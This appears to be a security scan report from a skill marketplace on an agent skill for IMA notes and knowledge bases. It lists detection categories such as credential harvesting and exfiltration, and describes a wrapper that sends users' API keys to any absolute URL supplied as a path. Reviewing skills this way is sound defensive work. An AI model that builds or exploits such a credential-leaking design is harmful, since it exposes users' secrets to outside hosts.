ClawHub

ima skills(中文-精炼版)

Security checks across malware telemetry and agentic risk

Overview

The skill mostly matches its IMA notes and knowledge-base purpose, but one generic Node API wrapper can send the user's IMA credentials to an arbitrary URL if invoked with an absolute path.

Review this skill before installing. Use it only with least-privilege IMA credentials, avoid invoking the generic ima-api.cjs helper with any full URL, confirm target note and knowledge-base IDs before writes, and treat COS temporary credentials as secrets. Prefer the narrower notes and knowledge-base scripts over the generic API wrapper.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Findings (17)

Tp4

High
Category
MCP Tool Poisoning
Confidence
91% confidence
Finding
The skill is presented as a note/knowledge-base management tool, but it also exposes a generic API client that can call arbitrary IMA OpenAPI paths via `--path`. That significantly expands capability beyond the declared behavior and can enable unintended data access or state-changing operations if an agent routes user requests into the generic interface without strict allowlisting.

Description-Behavior Mismatch

Medium
Confidence
85% confidence
Finding
The documented interfaces include creation and deletion of knowledge bases, which are broader and more destructive than the top-level description suggests. This can mislead users or orchestrating agents about the skill's write/destructive scope, increasing the risk of accidental administrative actions.

Context-Inappropriate Capability

Medium
Confidence
97% confidence
Finding
The request helper accepts any absolute URL when `apiPath` starts with `http`, overriding the intended `ima.qq.com` host restriction. Because the same function always attaches the IMA client ID and API key headers, an attacker who can influence `--path` can exfiltrate credentials to an arbitrary external host and turn this API wrapper into an SSRF-style outbound request primitive.

Description-Behavior Mismatch

Medium
Confidence
93% confidence
Finding
The tool is presented as supporting note and knowledge-base operations, but it accepts an arbitrary --path and forwards any JSON body to the IMA API. That makes the effective capability broader than described and could enable unintended access to other IMA endpoints if the supplied credentials have wider privileges.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
Documenting knowledge-base deletion without any warning or confirmation guidance makes accidental destructive operations more likely, especially in agentic contexts where commands may be inferred from natural language. Data deletion is irreversible or costly to recover, so missing safety interlocks is a real operational security risk.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The skill instructs users to supply long-lived API credentials via environment variables or config files but gives no warning about keeping them out of shell history, logs, screenshots, or shared terminal output. In an agent or collaborative environment, this omission increases the chance that secrets are accidentally exposed during normal use.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The manual curl example includes authentication headers carrying API credentials but does not warn that command lines, shell history, process listings, CI logs, and transcripts may capture those values. This can lead to credential leakage and unauthorized API access if users copy the example naively.

Missing User Warnings

High
Confidence
98% confidence
Finding
The upload example explicitly shows passing temporary COS secret_id, secret_key, and token as command-line arguments without any warning about sensitivity. Even though the credentials are temporary, they can still be captured by shell history, process inspection, agent logs, or transcript storage and abused to access or upload objects during their validity window.

Missing User Warnings

Medium
Confidence
92% confidence
Finding
The script writes short-lived COS secrets (secret_id, secret_key, token) to a predictable temporary-directory file on local disk, which creates credential persistence beyond the immediate process. On multi-user systems, shared temp locations, backups, crash dumps, or later local compromise could expose those credentials and allow unauthorized uploads or access within the token lifetime.

Missing User Warnings

Medium
Confidence
92% confidence
Finding
The script silently loads API credentials from environment variables or local config files and immediately uses them to make outbound HTTPS requests, without any user-facing disclosure or confirmation. In an agent-skill context, this can cause users or downstream systems to trigger authenticated remote actions or data access without realizing local secrets will be used.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The add-urls and add-note commands perform authenticated remote write operations that modify a knowledge base, but they do so without an explicit warning, confirmation, or dry-run safeguard. In an agent-driven workflow, this increases the risk of unintended data import, pollution of shared knowledge bases, or misuse of the user's authenticated access.

Missing User Warnings

Medium
Confidence
94% confidence
Finding
The create operation performs a state-changing write to the user's remote notes account, but the documentation does not clearly warn the user that invoking it will create persistent content. In an agent-skill context, missing a prominent user-facing write warning increases the risk of unintended account modification or surprise data creation when the agent acts on ambiguous prompts.

Missing User Warnings

Low
Confidence
85% confidence
Finding
The manual API example shows transmitting API credentials in headers but does not include a privacy/security warning about handling secrets, shell history exposure, log leakage, or safe storage. While header-based authentication over HTTPS is normal, omission of secret-handling guidance in reusable skill docs can lead to accidental credential disclosure by users or downstream tools.

Missing User Warnings

Medium
Confidence
76% confidence
Finding
The script accesses API credentials from environment variables and local files without any user-facing disclosure at runtime. In an agent-skill context, hidden secret access is risky because users may not realize the skill can consume locally available credentials, increasing the chance of unintended account use or trust-boundary violations.

Missing User Warnings

Medium
Confidence
80% confidence
Finding
The skill transmits note content, search queries, document IDs, and appended text to a remote API without an explicit user warning at the point of use. In a note-management context this is expected functionality, but the absence of clear disclosure can still lead to accidental transmission of sensitive content, especially when used through an agent abstraction where network effects may be less visible.

Missing User Warnings

Medium
Confidence
88% confidence
Finding
The script silently reads API credentials from environment variables and ~/.config/ima files without clearly disclosing this behavior to the user. In an agent skill context, hidden credential access is more dangerous because users may invoke the skill for content management without realizing local secrets will be consumed.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The tool transmits request bodies and authentication headers to a remote service, but the user-facing interface shown here does not clearly warn that provided content and loaded credentials will be sent over the network. In a skill environment handling notes, uploads, and knowledge-base data, this can expose sensitive user content unexpectedly.

VirusTotal

64/64 vendors flagged this skill as clean.

View on VirusTotal